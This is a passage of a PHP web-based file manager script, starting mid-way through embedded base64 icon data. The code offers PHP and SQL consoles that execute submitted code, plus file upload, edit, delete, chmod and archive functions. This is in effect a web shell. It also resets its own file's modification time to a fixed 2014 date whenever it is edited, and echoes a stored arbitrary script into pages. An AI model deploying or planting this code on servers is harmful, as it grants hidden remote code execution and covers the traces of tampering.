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"); } .file { background-image: url("data:image/png;base64,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"); } <?=fm_home_style()?> .img { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII="); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <script src="https://cdn.jsdelivr.net/gh/Den1xxx/EditArea@master/edit_area/edit_area_full.js"></script> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="25" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <script language="Javascript" type="text/javascript"> document.addEventListener('DOMContentLoaded', function() { editAreaLoader.init({ id: "newcontent" ,display: "later" ,start_highlight: true ,allow_resize: "both" ,allow_toggle: true ,word_wrap: true ,language: "ru" ,syntax: "<?=pathinfo($_REQUEST['edit'], PATHINFO_EXTENSION)?>" ,toolbar: "search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help" ,syntax_selection_allow: "css,html,js,php,python,xml,c,cpp,sql,basic,pas" }); }); </script> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_POST['search_recursive'])) { ini_set('max_execution_time', '0'); $search_data = find_text_in_files($_POST['path'], $_POST['mask'], $_POST['search_recursive']); if(!empty($search_data)) { $msg .= __('Found in files').' ('.count($search_data).'):<br>'; foreach ($search_data as $filename) { $msg .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a> '; } } else { $msg .= __('Nothing founded'); } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); 